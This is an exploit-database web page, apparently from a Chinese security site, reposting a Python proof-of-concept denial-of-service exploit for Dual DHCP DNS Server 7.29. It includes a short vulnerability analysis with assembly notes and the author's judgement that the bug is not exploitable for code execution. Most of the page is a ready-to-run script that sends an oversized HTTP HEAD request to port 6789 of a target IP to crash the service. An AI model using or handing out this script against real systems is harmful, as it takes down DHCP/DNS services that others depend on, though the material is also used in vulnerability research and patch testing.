首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Dual DHCP DNS Server 7.29 - Denial of Service 来源：https://www.infogen.al 作者：R-73eN 发布时间：2016-12-08   # Title :  Dual DHCP DNS Server 7.29 Buffer Overflow (Dos) # Date : 07/12/2016 # Author : R-73eN # Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit) # Vendor : http://dhcp-dns-server.sourceforge.net/ # Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download # Vulnerability Description: # The software crashes when it tries to write to an invalid address. # # MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input # MOV DWORD PTR SS:[ESP+4],31              # MOV DWORD PTR SS:[ESP],1 # ......................... # MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes. # # I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7) # Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe # contains 00 which is a badchar in our case. #   import socket import time import sys   banner = "\n\n" banner +="  ___        __        ____                 _    _  \n" banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n" banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n" banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n" banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n" print banner   host = "" port = 6789   def send_request(host,port,data):     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     try:         s.connect((host,port))         s.send(data)         print "[+] Malicious Packet Sent [+]\n"              except Exception:         print "[+] Exploit failed . . .[+]\n"     s.close()          ebx = "BBBB" eax = "CCCC" evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400   if(len(sys.argv) < 1):     print '\n Usage : exploit.py ipaddress\n'     exit(0) else:     host = sys.argv[1]   #The method doesn't really matters. It gets valideted only about the length request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n" send_request(host,port,request.replace("{REPLACE}",evil))   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Windows 10 x86/x64 WLAN AutoCo ·TP-LINK TD-W8951ND - Denial of ·Microsoft Internet Explorer js ·OpenSSH 7.2 - Denial of Servic ·Microsoft Edge - CBaseScriptab ·Microsoft Internet Explorer 9 ·Microsoft Internet Explorer 9 ·Microsoft Internet Explorer 9 ·Microsoft Edge - CMarkup::Ensu ·Microsoft Internet Explorer 9 ·Microsoft Edge - JSON.parse In ·OpenSSL 1.1.0a/1.1.0b - Denial   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved